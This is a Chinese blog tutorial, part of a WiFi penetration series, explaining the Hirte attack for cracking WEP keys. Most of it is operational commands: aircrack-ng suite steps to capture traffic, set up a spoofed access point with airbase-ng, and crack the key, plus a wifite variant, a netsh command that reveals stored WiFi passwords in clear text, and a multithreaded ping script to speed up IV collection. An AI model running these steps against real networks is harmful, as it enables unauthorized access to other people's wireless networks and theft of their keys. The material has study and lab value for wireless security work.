无线WiFi安全渗透与攻防(八)之WEP-Hirte渗透WEP加密

WEP-渗透WEP新思路–Hirte

1.Hirte介绍

Hirte是破解无线网络WEP Key的一种攻击类型

只要客户端设备(笔记本电脑,手机等)连接过的无线网络,那些WIFI即使是不在攻击者范围内也都能被破解,因为该wifi的WEP密钥和配置文件仍然存储在这些无线设备中。

netsh wlan show profile name="cisco-432F" key=clear

在这里插入图片描述

实施这种攻击的要求是建立一个和WEP网络相同的SSID假冒接入点。当客户端设备尝试自动连接到无线网络设时,假冒接入点(攻击者机器)会对受害者设备进行ARP攻击,导致受害者设备将包含密钥流的数据包发出。

2.Hirte破解原理

1.安装一个假的WEP AP(wifi名,mac地址要相同)并等待客户端连接

2.客户端的连接等待自动分配IP地址

3.客户端发送一个ARP数据包

4.获得了ARP分组,并且将其转换成一个ARP请求为同一客户机

5.客户回复

6.收集这些数据包

7.破解WEP密钥

3.渗透姿势1

1.查看网卡信息

ip a

在这里插入图片描述

2.监听网卡

airmon-ng start wlan0

在这里插入图片描述

3.扫描附近的wifi

airodump-ng wlan0mon

在这里插入图片描述

4.配置airodump-ng捕捉数据包并保存数据包文件名字为HSEK

airodump-ng wlan0mon --bssid D8:24:BD:79:18:0B --write HSEK
--bssid:AP的mac地址
--write:保存文件

在这里插入图片描述

命令执行后,会在当前目录下生成五个文件
在这里插入图片描述

5.开始伪造AP,用airbase-ng工具建立WEP接入点

airbase-ng -c 1 -a  D8:24:BD:79:18:0B --essid "cisco-1809" -W 1 -N wlan0mon
-c:信道
-a:模拟AP的MAC地址
--essid:wifi的名称
-W:设置加密位
-N:使Hirte攻击模式
wlan0mon:是接口

在这里插入图片描述
在这里插入图片描述

6.只要有客户端一连上来,就会自动进行攻击

在这里插入图片描述

在这里插入图片描述

7.启动aircrack-ng从捕获的数据包:Hirte破解WEP密钥

aircrack-ng HSEK-01.cap

在这里插入图片描述

破解密码是有要求的,第一次ivs必须要大于5000,当小于这个数的话,就会提示

在这里插入图片描述
在这里插入图片描述

4.渗透姿势2

1.扫描并指定破解方式

wifite  -wep -hirte

在这里插入图片描述

选择要破解的NUM

在这里插入图片描述

2.加速ivs收集

ping -t 192.168.1.1 //路由器的地址

3.开启攻击脚本加快ivs收集

python cmd.py

将下列代码保存为cmd.py 注意192.168.1.1这里填写你的路由器地址,我的是这个,你们的可能会有不同

import os
import threading
import time

class myThread (threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
    def run(self):
        cmd="ping /t 192.168.1.1"
        os.system(cmd)
        time.sleep(0.1)

threads=[]

for i in range(180):
    thread1 = myThread()
    thread1.start()
    threads.append(thread1)


for item in threads:
    item.join()



print ("退出主线程")

在这里插入图片描述

4.当ivs样本达到10000以后,成功获得密钥

在这里插入图片描述

posted @   私ははいしゃ敗者です  阅读(32)  评论(0编辑  收藏  举报  
相关博文:
阅读排行:
· 单线程的Redis速度为什么快?
· 展开说说关于C#中ORM框架的用法!
· Pantheons:用 TypeScript 打造主流大模型对话的一站式集成库
· SQL Server 2025 AI相关能力初探
· 为什么 退出登录 或 修改密码 无法使 token 失效
点击右上角即可分享
微信分享提示